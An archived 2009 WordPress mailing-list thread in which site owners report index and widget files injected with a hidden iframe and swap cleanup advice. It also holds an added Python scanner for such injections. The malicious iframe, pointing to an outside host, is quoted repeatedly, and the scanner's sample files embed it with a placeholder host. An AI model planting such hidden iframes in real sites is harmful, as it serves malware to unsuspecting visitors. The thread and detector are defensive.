It's basically a bot that logs in, finds any files in all directories that start with the above ...funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :)
-Chris 314media.com
On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh navjotjsi...@gmail.com wrote:
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote:
I had to restore from backup the entire blog. When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login). When I contacted Dreamhost support, they said it was an ftp hack. So, I would think it's not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
What version of wordpress are you running?
--
From: Chris Carter carter.ch...@gmail.com
Sent: Thursday, July 23, 2009 3:43 PM
To: wp-testers@lists.automattic.com
Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters
Chris Carter President 314media.com 314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with the following code inserted randomly:
iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
How to prevent further hacking? I am currently replacing all the files affected since all of them were affected at a certain date. I am on a shared hosting and only one blog got attacked.
Regards Navjot Singh
-- With Love Dinu http://chromestory.com http://offlineblog.net
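Added example (not from the thread or any of its posters): a Python scan for the pattern described in the message above, that is, files named index*, default*, main* or home* that carry an iframe hidden by its own style attribute. The function names, the injected.example host and the sample files are constructed for illustration, and the in-PHP check is a heuristic for the case where the injection landed inside a PHP block and broke the page.

```python
import fnmatch
import os
import re

# File-name patterns the message above says the bot goes after.
TARGET_PATTERNS = ("index*.*", "default*.*", "main*.*", "home*.*")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?|\?>", re.IGNORECASE)

# Constructed sample files; injected.example is a placeholder host.
BAD = ('<iframe src="http://injected.example:8080/x" width=125 height=125'
       ' style="visibility: hidden"></iframe>')
SAMPLE_FILES = {
    "index.php": "<?php\nrequire 'wp-blog-header.php';\n" + BAD + "\n?>\n",
    "wp-includes/default-widgets.php": "<?php echo 1; ?>\n<p>ok</p>\n" + BAD + "\n",
    "home.html": '<iframe src="/map.html" width="400"></iframe>\n',  # visible, benign
    "about.php": "<?php ?>\n" + BAD + "\n",  # infected, but not a targeted name
}

def is_targeted_name(filename):
    """True if the name matches a pattern from the thread (case-insensitive)."""
    return any(fnmatch.fnmatch(filename.lower(), p) for p in TARGET_PATTERNS)

def inside_php_block(text, offset):
    """Heuristic: is `offset` after a <?php that no ?> has closed yet?"""
    tags = PHP_TAG_RE.findall(text, 0, offset)
    return bool(tags) and tags[-1] != "?>"

def find_hidden_iframes(text):
    """One finding per <iframe> tag whose own attributes hide it."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        if HIDDEN_RE.search(m.group()):
            src = SRC_RE.search(m.group())
            findings.append({"line": text.count("\n", 0, m.start()) + 1,
                             "src": src.group(1) if src else None,
                             "in_php": inside_php_block(text, m.start())})
    return findings

def scan_tree(root, all_files=False):
    """Walk `root`; by default read only files with a targeted name."""
    report = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if all_files or is_targeted_name(name):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for hit in find_hidden_iframes(fh.read()):
                        report.append({"path": os.path.relpath(path, root), **hit})
    return sorted(report, key=lambda h: (h["path"], h["line"]))

def write_sample_tree(root):
    """Write SAMPLE_FILES under `root` so scan_tree can be tried offline."""
    for rel, body in SAMPLE_FILES.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
```

Calling scan_tree(webroot, all_files=True) covers the case another poster in this thread reports, where the iframe turned up on every page and not only in the targeted names.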
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows partition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked.
On 07/23/2009 05:50 PM, Chris Carter wrote:
Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IPs are strange.
Anyway, this virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected)
Also might want to check your CGI-BIN for files that look suspicious.
It's basically a bot that logs in, finds any files in all directories that start with the above ...funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :)
-Chris 314media.com
On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh navjotjsi...@gmail.com wrote:
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote:
I had to restore from backup the entire blog. When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login). When I contacted Dreamhost support, they said it was an ftp hack. So, I would think it's not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
What version of wordpress are you running?
--
From: Chris Carter carter.ch...@gmail.com
Sent: Thursday, July 23, 2009 3:43 PM
To: wp-testers@lists.automattic.com
Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters
Chris Carter President 314media.com 314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with the following code inserted randomly:
iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
How to prevent further hacking? I am currently replacing all the files affected since all of them were affected at a certain date. I am on a shared hosting and only one blog got attacked.
Regards Navjot Singh
-- With Love Dinu http://chromestory.com http://offlineblog.net
Re: [wp-testers] Default.widgets.php Hacked? What to do?
you might be in trouble...
On Thu, Jul 23, 2009 at 5:08 PM, Kirk M kmb4...@gmail.com wrote:
Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows partition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked.
On 07/23/2009 05:50 PM, Chris Carter wrote:
Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IPs are strange.
Anyway, this virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected)
Also might want to check your CGI-BIN for files that look suspicious.
It's basically a bot that logs in, finds any files in all directories that start with the above ...funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :)
-Chris 314media.com
On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh navjotjsi...@gmail.com wrote:
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote:
I had to restore from backup the entire blog. When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login). When I contacted Dreamhost support, they said it was an ftp hack. So, I would think it's not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
What version of wordpress are you running?
--
From: Chris Carter carter.ch...@gmail.com
Sent: Thursday, July 23, 2009 3:43 PM
To: wp-testers@lists.automattic.com
Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters
Chris Carter President 314media.com 314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with the following code inserted randomly:
iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
How to prevent further hacking? I am currently replacing all the files affected since all of them were affected at a certain date. I am on a shared hosting and only one blog got attacked.
Regards Navjot Singh
-- With Love Dinu http://chromestory.com http://offlineblog.net
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Thankfully I've only gone in using FTP on 2 of them within the last 2 months so I (and they) should be okay. Still, I'll have to check the files on each of those 2 if not re-upgrade 2.8.2 altogether just to be safe. Such is life in the online world.
On 07/23/2009 06:22 PM, Chris Carter wrote:
you might be in trouble...
On Thu, Jul 23, 2009 at 5:08 PM, Kirk M kmb4...@gmail.com wrote:
Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows partition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked.
On 07/23/2009 05:50 PM, Chris Carter wrote:
Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IPs are strange.
Anyway, this virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected)
Also might want to check your CGI-BIN for files that look suspicious.
It's basically a bot that logs in, finds any files in all directories that start with the above ...funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :)
-Chris 314media.com
On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh navjotjsi...@gmail.com wrote:
Yeah..my Wordpress mu install also got hacked. Just confirmed.
On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote:
I had to restore from backup the entire blog. When I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages (including pages after login). When I contacted Dreamhost support, they said it was an ftp hack.
So, I would think it's not a wordpress issue.
On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote:
2.8.1 at the time of being hacked. Just upgraded to 2.8.2
On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar josh2...@findingjesustoday.com wrote:
What version of wordpress are you running?
--
From: Chris Carter carter.ch...@gmail.com
Sent: Thursday, July 23, 2009 3:43 PM
To: wp-testers@lists.automattic.com
Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com
Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters
Chris Carter President 314media.com 314-714-5448
On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote:
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with the following code inserted randomly:
iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe
How to prevent further hacking? I am currently replacing all the files affected since all of them were affected at a certain date. I am on a shared hosting and only one blog got attacked.
Re: [wp-testers] Default.widgets.php Hacked? What to do?
File permissions were normal as it would be on any normal wordpress install, i.e. 644.
On Fri, Jul 24, 2009 at 02:01:14AM +0530, Navjot Singh wrote:
How to prevent further hacking? I am currently replacing all the files
And what were the file permissions?
-- Hal
Yeah, I found that funny too. Thank god users of my site didn't have to mark my site as infected with virus as the whole website didn't work!
On Fri, Jul 24, 2009 at 3:20 AM, Chris Carter carter.ch...@gmail.com wrote:
...funny thing was that sometimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :)
-Chris 314media.com